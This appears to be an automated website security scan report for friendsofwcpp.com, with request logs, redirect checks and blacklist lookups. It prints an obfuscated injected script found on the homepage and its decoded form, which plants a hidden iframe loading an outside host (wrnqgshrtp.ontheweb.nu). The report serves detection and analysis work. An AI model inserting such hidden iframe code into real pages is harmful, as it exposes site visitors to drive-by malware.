Scanned pages/files
Request | Server response | Status |
http://friendsofwcpp.com/ | 200 OK Content-Length: 3792 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) i=0;if(window["document"])try{grbregd=prototype;}catch(z){f=[9,4.5,105,51,32,20,100,55.5,99,58.5,109,50.5,110,58,46,51.5,101,58,69,54,101,54.5,101,55,116,57.5,66,60.5,84,48.5,103,39,97,54.5,101,20,39,49,111,50,121,19.5,41,45.5,48,46.5,41,61.5,13,4.5,9,4.5,105,51,114,48.5,109,50.5,114,20,41,29.5,13,4.5,9,62.5,32,50.5,108,57.5,101,16,123,6.5,9,4.5,9,50,111,49.5,117,54.5,101,55,116,23,119,57,105,58,101,20,34,30,105,51,114,48.5,109,50.5,32,57.5,114,49.5,61,19.5,104,58,116,56,58,23.5,47,59.5,114,55,1 Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://wrnqgshrtp.ontheweb.nu/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://wrnqgshrtp.ontheweb.nu/?go=2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10' <iframe src='http://wrnqgshrtp.ontheweb.nu/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://friendsofwcpp.com/test404page.js | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
http://friendsofwcpp.com//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js/ | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: friendsofwcpp.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Connection: close
Date: Thu, 22 Jan 2015 02:04:03 GMT
Accept-Ranges: bytes
Age: 0
ETag: "ed0-4c0cf583d0580"
Server: Apache/2
Content-Length: 3792
Content-Type: text/html
Expires: Thu, 22 Jan 2015 03:04:01 GMT
Last-Modified: Thu, 24 May 2012 21:57:58 GMT
...3792 bytes of data.
GET / HTTP/1.1
Host: friendsofwcpp.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Connection: close
Date: Thu, 22 Jan 2015 02:04:03 GMT
Accept-Ranges: bytes
Age: 0
ETag: "ed0-4c0cf583d0580"
Server: Apache/2
Content-Length: 3792
Content-Type: text/html
Expires: Thu, 22 Jan 2015 03:04:01 GMT
Last-Modified: Thu, 24 May 2012 21:57:58 GMT
...3792 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: friendsofwcpp.com
Referer: http://www.google.com/search?q=friendsofwcpp.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: friendsofwcpp.com
Referer: http://www.google.com/search?q=friendsofwcpp.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=friendsofwcpp.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://friendsofwcpp.com/
Result: friendsofwcpp.com is not infected or malware details are not published yet.
Result: friendsofwcpp.com is not infected or malware details are not published yet.